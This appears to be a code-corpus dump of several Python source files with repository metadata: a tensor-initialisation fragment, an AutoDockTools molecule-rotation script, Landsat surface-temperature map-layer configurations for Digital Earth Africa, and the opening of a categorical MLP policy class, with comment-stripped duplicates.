# NB: memory_format param is not accepted by torch.ones
memory_format=memory_format, pin_memory=pin_memory,)
elif tensor_init_params.create_op == CreateOp.ZEROS:
return torch.zeros(*size,
dtype=dtype,
layout=layout,
device=local_device,
pin_memory=pin_memory,
requires_grad=requires_grad,)
elif tensor_init_params.create_op == CreateOp.RAND:
return torch.rand(*size,
dtype=dtype,
layout=layout,
device=local_device,
pin_memory=pin_memory,
requires_grad=requires_grad,)
elif tensor_init_params.create_op == CreateOp.FULL:
return torch.full(size=size,
fill_value=tensor_init_params.fill_value,
layout=layout,
dtype=dtype,
requires_grad=requires_grad,
device=local_device, )
else:
raise ValueError(f'Unsupported create_op: {tensor_init_params.create_op}')
| true
| true
|
790b18f3fdca6c5f67de99d45ef9ca4dc84801f2
| 5,544
|
py
|
Python
|
mscreen/autodocktools_prepare_py3k/AutoDockTools/Utilities24/rotate_molecule.py
|
e-mayo/mscreen
|
a50f0b2f7104007c730baa51b4ec65c891008c47
|
[
"MIT"
] | 9
|
2021-03-06T04:24:28.000Z
|
2022-01-03T09:53:07.000Z
|
AutoDockTools/Utilities24/rotate_molecule.py
|
e-mayo/autodocktools-prepare-py3k
|
2dd2316837bcb7c19384294443b2855e5ccd3e01
|
[
"BSD-3-Clause"
] | 3
|
2021-03-07T05:37:16.000Z
|
2021-09-19T15:06:54.000Z
|
AutoDockTools/Utilities24/rotate_molecule.py
|
e-mayo/autodocktools-prepare-py3k
|
2dd2316837bcb7c19384294443b2855e5ccd3e01
|
[
"BSD-3-Clause"
] | 4
|
2019-08-28T23:11:39.000Z
|
2021-11-27T08:43:36.000Z
|
#!/usr/bin/env python
#$Id: rotate_molecule.py,v 1.2.10.1 2016/02/11 09:24:08 annao Exp $
import os
from MolKit import Read
from MolKit.pdbWriter import PdbWriter, PdbqsWriter, PdbqWriter, PdbqtWriter
from mglutil.math.rotax import rotax
import numpy
if __name__ == '__main__':
import sys
import getopt
def usage():
"Print helpful, accurate usage statement to stdout."
print("Usage: rotate_molecule.py -f filename")
print()
print(" Description of command...")
print(" [-f] filename")
print(" Optional parameters:")
print(" [-o] alternative output filename")
print(" (default is 'rotated_' +filename)")
print(" [-y] rotate around the y axis")
print(" (default is rotation around the z axis)")
print(" [-x] rotate around the x axis")
print(" (default is rotation around the z axis)")
print(" [-u] user-defined axis of rotation '1.0,2.0,-6.2'")
print(" (default is rotation around the z axis)")
print(" [-a] angle for rotation about axis ")
print(" (default is rotation around the z axis)")
print(" [-v] verbose output")
# process command arguments
try:
opt_list, args = getopt.getopt(sys.argv[1:], 'f:o:xyu:a:v')
except getopt.GetoptError as msg:
print('rotate_molecule.py: %s' %msg)
usage()
sys.exit(2)
# initialize required parameters
#-f: pdb_filename_stem
filename = None
# optional parameters
verbose = None
outputfilename = None
rotation = 'z'
#arbitrary axis angle for rotation
axis = None
angle = None
#'f:o:v'
for o, a in opt_list:
print("o=", o, " a=",a)
if o in ('-f', '--f'):
filename = a
if verbose: print('set filename to ', filename)
outputfilename = 'rotated_' + filename
if o in ('-o', '--o'):
outputfilename = a
if verbose:
print('set output outputfilename to ', a)
if o in ('-x', '--x'):
rotation = 'x'
if verbose: print('set rotation to ', rotation)
if o in ('-y', '--y'):
rotation = 'y'
if verbose: print('set rotation to ', rotation)
if o in ('-u', '--u'):
axis = a
if verbose: print('set user-defined axis to ', axis)
if o in ('-a', '--a'):
angle = a
if verbose: print('set angle for rotation to ', angle)
if o in ('-v', '--v'):
verbose = True
if verbose: print('set verbose to ', True)
if o in ('-h', '--'):
usage()
sys.exit()
if not filename:
print('rotate_molecule: filename must be specified.')
usage()
sys.exit()
mol = Read(filename)[0]
if verbose: print('read ', filename)
filetype = os.path.splitext(os.path.basename(filename))[1]
if verbose: print("filetype=", filetype)
writer = None
if filetype=='.pdbqt':
writer = PdbqtWriter()
elif filetype=='.pdbq':
writer = PdbqWriter()
elif filetype=='.pdbqs':
writer = PdbqsWriter()
elif filetype=='.pdb':
writer = PdbWriter()
else:
print('Sorry! Unable to write this filetype->', filetype)
center = numpy.add.reduce(mol.allAtoms.coords)/len(mol.allAtoms)
crds = numpy.array(mol.allAtoms.coords)
center = numpy.add.reduce(crds)/len(mol.allAtoms)
crds = crds - center
crds = crds.tolist()
mol.allAtoms.updateCoords(crds)
lenCoords = len(crds)
#rotate the atoms here
if axis is not None and angle is not None:
rot = (float(angle)* 3.14159/180.)%(2 * numpy.pi)
x = numpy.array([0.,0.,0.])
y = numpy.array(list(map(float,axis.split(','))))
matrix = rotax(x,y, rot)
_ones = numpy.ones(lenCoords, 'f')
_ones.shape = (lenCoords,1)
mov_coords = numpy.concatenate((crds, _ones),1)
newcoords = numpy.dot(mov_coords, matrix)
nc = newcoords[:,:3].astype('f')
for i in range(lenCoords):
mol.allAtoms[i]._coords[0] = nc[i].tolist()
else:
if rotation=='z':
#for rotation around z-axis:
for a in mol.allAtoms:
a._coords[0][0] = -1.*a._coords[0][0]
a._coords[0][1] = -1.*a._coords[0][1]
elif rotation=='y':
#for rotation around y-axis:
for a in mol.allAtoms:
a._coords[0][0] = -1.*a._coords[0][0]
a._coords[0][2] = -1.*a._coords[0][2]
elif rotation=='x':
#for rotation around x-axis:
for a in mol.allAtoms:
a._coords[0][1] = -1.*a._coords[0][1]
a._coords[0][2] = -1.*a._coords[0][2]
ncrds = numpy.array(mol.allAtoms.coords)
ncrds = ncrds + center
ncrds = ncrds.tolist()
mol.allAtoms.updateCoords(ncrds)
if writer:
outptr = open(outputfilename, 'w')
liglines = mol.parser.allLines
ctr = 0
for l in liglines:
if l.find("ATOM")!=0 and l.find("HETATM")!=0:
outptr.write(l)
else:
writer.write_atom(outptr, mol.allAtoms[ctr])
ctr += 1
outptr.close()
# To execute this command type:
# rotate_molecule.py -f filename [-o outputfilename -u axis -a angle to rotate] -v
| 33.6
| 82
| 0.537879
|
import os
from MolKit import Read
from MolKit.pdbWriter import PdbWriter, PdbqsWriter, PdbqWriter, PdbqtWriter
from mglutil.math.rotax import rotax
import numpy
if __name__ == '__main__':
import sys
import getopt
def usage():
print("Usage: rotate_molecule.py -f filename")
print()
print(" Description of command...")
print(" [-f] filename")
print(" Optional parameters:")
print(" [-o] alternative output filename")
print(" (default is 'rotated_' +filename)")
print(" [-y] rotate around the y axis")
print(" (default is rotation around the z axis)")
print(" [-x] rotate around the x axis")
print(" (default is rotation around the z axis)")
print(" [-u] user-defined axis of rotation '1.0,2.0,-6.2'")
print(" (default is rotation around the z axis)")
print(" [-a] angle for rotation about axis ")
print(" (default is rotation around the z axis)")
print(" [-v] verbose output")
try:
opt_list, args = getopt.getopt(sys.argv[1:], 'f:o:xyu:a:v')
except getopt.GetoptError as msg:
print('rotate_molecule.py: %s' %msg)
usage()
sys.exit(2)
filename = None
verbose = None
outputfilename = None
rotation = 'z'
axis = None
angle = None
for o, a in opt_list:
print("o=", o, " a=",a)
if o in ('-f', '--f'):
filename = a
if verbose: print('set filename to ', filename)
outputfilename = 'rotated_' + filename
if o in ('-o', '--o'):
outputfilename = a
if verbose:
print('set output outputfilename to ', a)
if o in ('-x', '--x'):
rotation = 'x'
if verbose: print('set rotation to ', rotation)
if o in ('-y', '--y'):
rotation = 'y'
if verbose: print('set rotation to ', rotation)
if o in ('-u', '--u'):
axis = a
if verbose: print('set user-defined axis to ', axis)
if o in ('-a', '--a'):
angle = a
if verbose: print('set angle for rotation to ', angle)
if o in ('-v', '--v'):
verbose = True
if verbose: print('set verbose to ', True)
if o in ('-h', '--'):
usage()
sys.exit()
if not filename:
print('rotate_molecule: filename must be specified.')
usage()
sys.exit()
mol = Read(filename)[0]
if verbose: print('read ', filename)
filetype = os.path.splitext(os.path.basename(filename))[1]
if verbose: print("filetype=", filetype)
writer = None
if filetype=='.pdbqt':
writer = PdbqtWriter()
elif filetype=='.pdbq':
writer = PdbqWriter()
elif filetype=='.pdbqs':
writer = PdbqsWriter()
elif filetype=='.pdb':
writer = PdbWriter()
else:
print('Sorry! Unable to write this filetype->', filetype)
center = numpy.add.reduce(mol.allAtoms.coords)/len(mol.allAtoms)
crds = numpy.array(mol.allAtoms.coords)
center = numpy.add.reduce(crds)/len(mol.allAtoms)
crds = crds - center
crds = crds.tolist()
mol.allAtoms.updateCoords(crds)
lenCoords = len(crds)
if axis is not None and angle is not None:
rot = (float(angle)* 3.14159/180.)%(2 * numpy.pi)
x = numpy.array([0.,0.,0.])
y = numpy.array(list(map(float,axis.split(','))))
matrix = rotax(x,y, rot)
_ones = numpy.ones(lenCoords, 'f')
_ones.shape = (lenCoords,1)
mov_coords = numpy.concatenate((crds, _ones),1)
newcoords = numpy.dot(mov_coords, matrix)
nc = newcoords[:,:3].astype('f')
for i in range(lenCoords):
mol.allAtoms[i]._coords[0] = nc[i].tolist()
else:
if rotation=='z':
for a in mol.allAtoms:
a._coords[0][0] = -1.*a._coords[0][0]
a._coords[0][1] = -1.*a._coords[0][1]
elif rotation=='y':
for a in mol.allAtoms:
a._coords[0][0] = -1.*a._coords[0][0]
a._coords[0][2] = -1.*a._coords[0][2]
elif rotation=='x':
for a in mol.allAtoms:
a._coords[0][1] = -1.*a._coords[0][1]
a._coords[0][2] = -1.*a._coords[0][2]
ncrds = numpy.array(mol.allAtoms.coords)
ncrds = ncrds + center
ncrds = ncrds.tolist()
mol.allAtoms.updateCoords(ncrds)
if writer:
outptr = open(outputfilename, 'w')
liglines = mol.parser.allLines
ctr = 0
for l in liglines:
if l.find("ATOM")!=0 and l.find("HETATM")!=0:
outptr.write(l)
else:
writer.write_atom(outptr, mol.allAtoms[ctr])
ctr += 1
outptr.close()
| true
| true
|
790b18f6734a0e743f09e074c7c58ce541977cf8
| 10,660
|
py
|
Python
|
services/ows_refactored/surface_temperature/ows_lsc2_st_cfg.py
|
FlexiGroBots-H2020/datacube-config
|
8d6c61cf7c9a68552176aeb4aabc7ac6c3fc5a91
|
[
"Apache-2.0"
] | null | null | null |
services/ows_refactored/surface_temperature/ows_lsc2_st_cfg.py
|
FlexiGroBots-H2020/datacube-config
|
8d6c61cf7c9a68552176aeb4aabc7ac6c3fc5a91
|
[
"Apache-2.0"
] | null | null | null |
services/ows_refactored/surface_temperature/ows_lsc2_st_cfg.py
|
FlexiGroBots-H2020/datacube-config
|
8d6c61cf7c9a68552176aeb4aabc7ac6c3fc5a91
|
[
"Apache-2.0"
] | null | null | null |
from ows_refactored.common.ows_reslim_cfg import reslim_landsat
bands_ls5_st = {
"ST_B6": ["st"],
"ST_QA": ["st_qa"],
"QA_PIXEL": ["pq"]
}
bands_ls7_st = {
"ST_B6": ["st"],
"ST_QA": ["st_qa"],
"QA_PIXEL": ["pq"]
}
bands_ls8_st = {
"ST_B10": ["st"],
"ST_QA": ["st_qa"],
"QA_PIXEL": ["pq"]
}
style_lsc2_st = {
"name": "surface_temperature",
"title": "Surface temperature - Celsius",
"abstract": "Surface temperature in degrees Celsius",
"index_expression": "(0.00341802*st - 124.15)",
"mpl_ramp": "magma",
"range": [0.0, 50.0],
"legend": {
"begin": "0.0",
"end": "50.0",
"decimal_places": 1,
"ticks": ["0.0", "10.0", "20.0", "30.0", "40.0", "50.0"],
"tick_labels": {
"0.0": {"prefix": "<"},
"10.0": {"label": "10.0"},
"20.0": {"label": "20.0"},
"30.0": {"label": "30.0"},
"40.0": {"label": "40.0"},
"50.0": {"prefix": ">"},
},
},
}
style_lsc2_st_masked = {
"name": "surface_temperature_masked",
"title": "Surface temperature (cloud masked) - Celsius",
"abstract": "Surface temperature in degrees Celsius",
"index_expression": "(0.00341802*st - 124.15)",
"mpl_ramp": "magma",
"range": [0.0, 50.0],
"pq_masks": [
{
"band": "QA_PIXEL",
"flags": {
"clear": True
},
},
],
"legend": {
"begin": "0.0",
"end": "50.0",
"decimal_places": 1,
"ticks": ["0.0", "10.0", "20.0", "30.0", "40.0", "50.0"],
"tick_labels": {
"0.0": {"prefix": "<"},
"10.0": {"label": "10.0"},
"20.0": {"label": "20.0"},
"30.0": {"label": "30.0"},
"40.0": {"label": "40.0"},
"50.0": {"prefix": ">"},
},
},
}
style_lsc2_st_masked_ls8 = {
"name": "surface_temperature_masked",
"title": "Surface temperature (cloud masked) - Celsius",
"abstract": "Surface temperature in degrees Celsius",
"index_expression": "(0.00341802*st - 124.15)",
"mpl_ramp": "magma",
"range": [0.0, 50.0],
"pq_masks": [
{
"band": "QA_PIXEL",
"flags": {
"clear": True,
"cirrus": "not_high_confidence"
},
},
],
"legend": {
"begin": "0.0",
"end": "50.0",
"decimal_places": 1,
"ticks": ["0.0", "10.0", "20.0", "30.0", "40.0", "50.0"],
"tick_labels": {
"0.0": {"prefix": "<"},
"10.0": {"label": "10.0"},
"20.0": {"label": "20.0"},
"30.0": {"label": "30.0"},
"40.0": {"label": "40.0"},
"50.0": {"prefix": ">"},
},
},
}
style_lsc2_st_qa = {
"name": "surface_temperature_uncertainty",
"title": "Surface temperature uncertainty - Celsius",
"abstract": "Surface temperature uncertainty in degrees Celsius",
"index_expression": "(0.01*st_qa)",
"mpl_ramp": "viridis",
"range": [0.0, 6.0],
"legend": {
"begin": "0.0",
"end": "6.0",
"decimal_places": 1,
"ticks": ["0.0", "1.0", "2.0", "3.0", "4.0", "5.0", "6.0"],
"tick_labels": {
"0.0": {"label": "0.0"},
"1.0": {"label": "1.0"},
"2.0": {"label": "2.0"},
"3.0": {"label": "3.0"},
"4.0": {"label": "4.0"},
"5.0": {"label": "5.0"},
"6.0": {"prefix": ">"},
},
},
}
layer_ls8 = {
"title": "Surface temperature (Landsat 8)",
"name": "ls8_st",
"abstract": """
Surface temperature measures the Earth’s surface temperature and is an important geophysical parameter in global energy balance studies and hydrologic modeling. Surface temperature is also useful for monitoring crop and vegetation health, and extreme heat events such as natural disasters (e.g., volcanic eruptions, wildfires), and urban heat island effects.
DE Africa provides access to Landsat Collection 2 Level-2 Surface Temperature products over Africa. USGS Landsat Collection 2 offers improved processing, geometric accuracy, and radiometric calibration compared to previous Collection 1 products. The Level-2 products are endorsed by the Committee on Earth Observation Satellites (CEOS) to be Analysis Ready Data for Land (CARD4L)-compliant.
More techincal information about the Landsat Surface Temperature product can be found in the User Guide (https://docs.digitalearthafrica.org/en/latest/data_specs/Landsat_C2_ST_specs.html).
Landsat 8 product has a spatial resolution of 30 m and a temporal coverage of 2013 to present.
Landsat Level- 2 Surface Temperature Science Product courtesy of the U.S. Geological Survey.
For more information on Landsat products, see https://www.usgs.gov/core-science-systems/nli/landsat/landsat-collection-2-level-2-science-products.
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ls8_st",
"bands": bands_ls8_st,
"dynamic": True,
"resource_limits": reslim_landsat,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False, # True
"apply_solar_corrections": False,
},
"flags": [
{
"product": "ls8_st",
"band": "QA_PIXEL",
},
],
"native_crs": "EPSG:3857",
"native_resolution": [30.0, -30.0],
"styling": {
"default_style": "surface_temperature",
"styles": [
style_lsc2_st,
style_lsc2_st_qa,
style_lsc2_st_masked_ls8,
],
},
}
layer_ls7 = {
"title": "Surface temperature (Landsat 7)",
"name": "ls7_st",
"abstract": """
Surface temperature measures the Earth’s surface temperature and is an important geophysical parameter in global energy balance studies and hydrologic modeling. Surface temperature is also useful for monitoring crop and vegetation health, and extreme heat events such as natural disasters (e.g., volcanic eruptions, wildfires), and urban heat island effects.
DE Africa provides access to Landsat Collection 2 Level-2 Surface Temperature products over Africa. USGS Landsat Collection 2 offers improved processing, geometric accuracy, and radiometric calibration compared to previous Collection 1 products. The Level-2 products are endorsed by the Committee on Earth Observation Satellites (CEOS) to be Analysis Ready Data for Land (CARD4L)-compliant.
More techincal information about the Landsat Surface Temperature product can be found in the User Guide (https://docs.digitalearthafrica.org/en/latest/data_specs/Landsat_C2_ST_specs.html).
Landsat 7 product has a spatial resolution of 30 m and a temporal coverage of 1999 to present.
Landsat Level- 2 Surface Temperature Science Product courtesy of the U.S. Geological Survey.
For more information on Landsat products, see https://www.usgs.gov/core-science-systems/nli/landsat/landsat-collection-2-level-2-science-products.
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ls7_st",
"bands": bands_ls7_st,
"dynamic": True,
"resource_limits": reslim_landsat,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False, # True
"apply_solar_corrections": False,
},
"flags": [
{
"product": "ls7_st",
"band": "QA_PIXEL",
},
],
"native_crs": "EPSG:3857",
"native_resolution": [30.0, -30.0],
"styling": {
"default_style": "surface_temperature",
"styles": [
style_lsc2_st,
style_lsc2_st_qa,
style_lsc2_st_masked,
],
},
}
layer_ls5 = {
"title": "Surface temperature (Landsat 5)",
"name": "ls5_st",
"abstract": """
Surface temperature measures the Earth’s surface temperature and is an important geophysical parameter in global energy balance studies and hydrologic modeling. Surface temperature is also useful for monitoring crop and vegetation health, and extreme heat events such as natural disasters (e.g., volcanic eruptions, wildfires), and urban heat island effects.
DE Africa provides access to Landsat Collection 2 Level-2 Surface Temperature products over Africa. USGS Landsat Collection 2 offers improved processing, geometric accuracy, and radiometric calibration compared to previous Collection 1 products. The Level-2 products are endorsed by the Committee on Earth Observation Satellites (CEOS) to be Analysis Ready Data for Land (CARD4L)-compliant.
More techincal information about the Landsat Surface Temperature product can be found in the User Guide (https://docs.digitalearthafrica.org/en/latest/data_specs/Landsat_C2_ST_specs.html).
Landsat 5 product has a spatial resolution of 30 m and a temporal coverage of 1984 to 2012.
Landsat Level- 2 Surface Temperature Science Product courtesy of the U.S. Geological Survey.
For more information on Landsat products, see https://www.usgs.gov/core-science-systems/nli/landsat/landsat-collection-2-level-2-science-products.
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ls5_st",
"bands": bands_ls5_st,
"resource_limits": reslim_landsat,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False, # True
"apply_solar_corrections": False,
},
"flags": [
{
"product": "ls5_st",
"band": "QA_PIXEL",
},
],
"native_crs": "EPSG:3857",
"native_resolution": [30.0, -30.0],
"styling": {
"default_style": "surface_temperature",
"styles": [
style_lsc2_st,
style_lsc2_st_qa,
style_lsc2_st_masked,
],
},
}
| 40.075188
| 390
| 0.621764
|
from ows_refactored.common.ows_reslim_cfg import reslim_landsat
bands_ls5_st = {
"ST_B6": ["st"],
"ST_QA": ["st_qa"],
"QA_PIXEL": ["pq"]
}
bands_ls7_st = {
"ST_B6": ["st"],
"ST_QA": ["st_qa"],
"QA_PIXEL": ["pq"]
}
bands_ls8_st = {
"ST_B10": ["st"],
"ST_QA": ["st_qa"],
"QA_PIXEL": ["pq"]
}
style_lsc2_st = {
"name": "surface_temperature",
"title": "Surface temperature - Celsius",
"abstract": "Surface temperature in degrees Celsius",
"index_expression": "(0.00341802*st - 124.15)",
"mpl_ramp": "magma",
"range": [0.0, 50.0],
"legend": {
"begin": "0.0",
"end": "50.0",
"decimal_places": 1,
"ticks": ["0.0", "10.0", "20.0", "30.0", "40.0", "50.0"],
"tick_labels": {
"0.0": {"prefix": "<"},
"10.0": {"label": "10.0"},
"20.0": {"label": "20.0"},
"30.0": {"label": "30.0"},
"40.0": {"label": "40.0"},
"50.0": {"prefix": ">"},
},
},
}
style_lsc2_st_masked = {
"name": "surface_temperature_masked",
"title": "Surface temperature (cloud masked) - Celsius",
"abstract": "Surface temperature in degrees Celsius",
"index_expression": "(0.00341802*st - 124.15)",
"mpl_ramp": "magma",
"range": [0.0, 50.0],
"pq_masks": [
{
"band": "QA_PIXEL",
"flags": {
"clear": True
},
},
],
"legend": {
"begin": "0.0",
"end": "50.0",
"decimal_places": 1,
"ticks": ["0.0", "10.0", "20.0", "30.0", "40.0", "50.0"],
"tick_labels": {
"0.0": {"prefix": "<"},
"10.0": {"label": "10.0"},
"20.0": {"label": "20.0"},
"30.0": {"label": "30.0"},
"40.0": {"label": "40.0"},
"50.0": {"prefix": ">"},
},
},
}
style_lsc2_st_masked_ls8 = {
"name": "surface_temperature_masked",
"title": "Surface temperature (cloud masked) - Celsius",
"abstract": "Surface temperature in degrees Celsius",
"index_expression": "(0.00341802*st - 124.15)",
"mpl_ramp": "magma",
"range": [0.0, 50.0],
"pq_masks": [
{
"band": "QA_PIXEL",
"flags": {
"clear": True,
"cirrus": "not_high_confidence"
},
},
],
"legend": {
"begin": "0.0",
"end": "50.0",
"decimal_places": 1,
"ticks": ["0.0", "10.0", "20.0", "30.0", "40.0", "50.0"],
"tick_labels": {
"0.0": {"prefix": "<"},
"10.0": {"label": "10.0"},
"20.0": {"label": "20.0"},
"30.0": {"label": "30.0"},
"40.0": {"label": "40.0"},
"50.0": {"prefix": ">"},
},
},
}
style_lsc2_st_qa = {
"name": "surface_temperature_uncertainty",
"title": "Surface temperature uncertainty - Celsius",
"abstract": "Surface temperature uncertainty in degrees Celsius",
"index_expression": "(0.01*st_qa)",
"mpl_ramp": "viridis",
"range": [0.0, 6.0],
"legend": {
"begin": "0.0",
"end": "6.0",
"decimal_places": 1,
"ticks": ["0.0", "1.0", "2.0", "3.0", "4.0", "5.0", "6.0"],
"tick_labels": {
"0.0": {"label": "0.0"},
"1.0": {"label": "1.0"},
"2.0": {"label": "2.0"},
"3.0": {"label": "3.0"},
"4.0": {"label": "4.0"},
"5.0": {"label": "5.0"},
"6.0": {"prefix": ">"},
},
},
}
layer_ls8 = {
"title": "Surface temperature (Landsat 8)",
"name": "ls8_st",
"abstract": """
Surface temperature measures the Earth’s surface temperature and is an important geophysical parameter in global energy balance studies and hydrologic modeling. Surface temperature is also useful for monitoring crop and vegetation health, and extreme heat events such as natural disasters (e.g., volcanic eruptions, wildfires), and urban heat island effects.
DE Africa provides access to Landsat Collection 2 Level-2 Surface Temperature products over Africa. USGS Landsat Collection 2 offers improved processing, geometric accuracy, and radiometric calibration compared to previous Collection 1 products. The Level-2 products are endorsed by the Committee on Earth Observation Satellites (CEOS) to be Analysis Ready Data for Land (CARD4L)-compliant.
More techincal information about the Landsat Surface Temperature product can be found in the User Guide (https://docs.digitalearthafrica.org/en/latest/data_specs/Landsat_C2_ST_specs.html).
Landsat 8 product has a spatial resolution of 30 m and a temporal coverage of 2013 to present.
Landsat Level- 2 Surface Temperature Science Product courtesy of the U.S. Geological Survey.
For more information on Landsat products, see https://www.usgs.gov/core-science-systems/nli/landsat/landsat-collection-2-level-2-science-products.
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ls8_st",
"bands": bands_ls8_st,
"dynamic": True,
"resource_limits": reslim_landsat,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False,
"apply_solar_corrections": False,
},
"flags": [
{
"product": "ls8_st",
"band": "QA_PIXEL",
},
],
"native_crs": "EPSG:3857",
"native_resolution": [30.0, -30.0],
"styling": {
"default_style": "surface_temperature",
"styles": [
style_lsc2_st,
style_lsc2_st_qa,
style_lsc2_st_masked_ls8,
],
},
}
layer_ls7 = {
"title": "Surface temperature (Landsat 7)",
"name": "ls7_st",
"abstract": """
Surface temperature measures the Earth’s surface temperature and is an important geophysical parameter in global energy balance studies and hydrologic modeling. Surface temperature is also useful for monitoring crop and vegetation health, and extreme heat events such as natural disasters (e.g., volcanic eruptions, wildfires), and urban heat island effects.
DE Africa provides access to Landsat Collection 2 Level-2 Surface Temperature products over Africa. USGS Landsat Collection 2 offers improved processing, geometric accuracy, and radiometric calibration compared to previous Collection 1 products. The Level-2 products are endorsed by the Committee on Earth Observation Satellites (CEOS) to be Analysis Ready Data for Land (CARD4L)-compliant.
More techincal information about the Landsat Surface Temperature product can be found in the User Guide (https://docs.digitalearthafrica.org/en/latest/data_specs/Landsat_C2_ST_specs.html).
Landsat 7 product has a spatial resolution of 30 m and a temporal coverage of 1999 to present.
Landsat Level- 2 Surface Temperature Science Product courtesy of the U.S. Geological Survey.
For more information on Landsat products, see https://www.usgs.gov/core-science-systems/nli/landsat/landsat-collection-2-level-2-science-products.
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ls7_st",
"bands": bands_ls7_st,
"dynamic": True,
"resource_limits": reslim_landsat,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False,
"apply_solar_corrections": False,
},
"flags": [
{
"product": "ls7_st",
"band": "QA_PIXEL",
},
],
"native_crs": "EPSG:3857",
"native_resolution": [30.0, -30.0],
"styling": {
"default_style": "surface_temperature",
"styles": [
style_lsc2_st,
style_lsc2_st_qa,
style_lsc2_st_masked,
],
},
}
layer_ls5 = {
"title": "Surface temperature (Landsat 5)",
"name": "ls5_st",
"abstract": """
Surface temperature measures the Earth’s surface temperature and is an important geophysical parameter in global energy balance studies and hydrologic modeling. Surface temperature is also useful for monitoring crop and vegetation health, and extreme heat events such as natural disasters (e.g., volcanic eruptions, wildfires), and urban heat island effects.
DE Africa provides access to Landsat Collection 2 Level-2 Surface Temperature products over Africa. USGS Landsat Collection 2 offers improved processing, geometric accuracy, and radiometric calibration compared to previous Collection 1 products. The Level-2 products are endorsed by the Committee on Earth Observation Satellites (CEOS) to be Analysis Ready Data for Land (CARD4L)-compliant.
More techincal information about the Landsat Surface Temperature product can be found in the User Guide (https://docs.digitalearthafrica.org/en/latest/data_specs/Landsat_C2_ST_specs.html).
Landsat 5 product has a spatial resolution of 30 m and a temporal coverage of 1984 to 2012.
Landsat Level- 2 Surface Temperature Science Product courtesy of the U.S. Geological Survey.
For more information on Landsat products, see https://www.usgs.gov/core-science-systems/nli/landsat/landsat-collection-2-level-2-science-products.
This product is accessible through OGC Web Service (https://ows.digitalearth.africa/), for analysis in DE Africa Sandbox JupyterLab (https://github.com/digitalearthafrica/deafrica-sandbox-notebooks/wiki) and for direct download from AWS S3 (https://data.digitalearth.africa/).
""",
"product_name": "ls5_st",
"bands": bands_ls5_st,
"resource_limits": reslim_landsat,
"image_processing": {
"extent_mask_func": "datacube_ows.ogc_utils.mask_by_val",
"always_fetch_bands": [],
"manual_merge": False,
"apply_solar_corrections": False,
},
"flags": [
{
"product": "ls5_st",
"band": "QA_PIXEL",
},
],
"native_crs": "EPSG:3857",
"native_resolution": [30.0, -30.0],
"styling": {
"default_style": "surface_temperature",
"styles": [
style_lsc2_st,
style_lsc2_st_qa,
style_lsc2_st_masked,
],
},
}
| true
| true
|
790b1a9e45cc381969fa85f3a9d96924b9186a1b
| 5,640
|
py
|
Python
|
src/metarl/tf/policies/categorical_mlp_policy.py
|
icml2020submission6857/metarl
|
9b66cefa2b6bcb6a38096d629ce8853b47c7171d
|
[
"MIT"
] | 2
|
2020-03-15T14:35:15.000Z
|
2021-02-15T16:38:00.000Z
|
src/metarl/tf/policies/categorical_mlp_policy.py
|
icml2020submission6857/metarl
|
9b66cefa2b6bcb6a38096d629ce8853b47c7171d
|
[
"MIT"
] | null | null | null |
src/metarl/tf/policies/categorical_mlp_policy.py
|
icml2020submission6857/metarl
|
9b66cefa2b6bcb6a38096d629ce8853b47c7171d
|
[
"MIT"
] | 1
|
2020-02-24T03:04:23.000Z
|
2020-02-24T03:04:23.000Z
|
"""CategoricalMLPPolicy."""
import akro
import tensorflow as tf
from metarl.tf.distributions import Categorical
from metarl.tf.models import MLPModel
from metarl.tf.policies import StochasticPolicy
class CategoricalMLPPolicy(StochasticPolicy):
"""CategoricalMLPPolicy
A policy that contains a MLP to make prediction based on
a categorical distribution.
It only works with akro.Discrete action space.
Args:
env_spec (metarl.envs.env_spec.EnvSpec): Environment specification.
name (str): Policy name, also the variable scope.
hidden_sizes (list[int]): Output dimension of dense layer(s).
For example, (32, 32) means the MLP of this policy consists of two
hidden layers, each with 32 hidden units.
hidden_nonlinearity (callable): Activation function for intermediate
dense layer(s). It should return a tf.Tensor. Set it to
None to maintain a linear activation.
hidden_w_init (callable): Initializer function for the weight
of intermediate dense layer(s). The function should return a
tf.Tensor.
hidden_b_init (callable): Initializer function for the bias
of intermediate dense layer(s). The function should return a
tf.Tensor.
output_nonlinearity (callable): Activation function for output dense
layer. It should return a tf.Tensor. Set it to None to
maintain a linear activation.
output_w_init (callable): Initializer function for the weight
of output dense layer(s). The function should return a
tf.Tensor.
output_b_init (callable): Initializer function for the bias
of output dense layer(s). The function should return a
tf.Tensor.
layer_normalization (bool): Bool for using layer normalization or not.
"""
def __init__(self,
env_spec,
name='CategoricalMLPPolicy',
hidden_sizes=(32, 32),
hidden_nonlinearity=tf.nn.tanh,
hidden_w_init=tf.glorot_uniform_initializer(),
hidden_b_init=tf.zeros_initializer(),
output_nonlinearity=tf.nn.softmax,
output_w_init=tf.glorot_uniform_initializer(),
output_b_init=tf.zeros_initializer(),
layer_normalization=False):
assert isinstance(env_spec.action_space, akro.Discrete), (
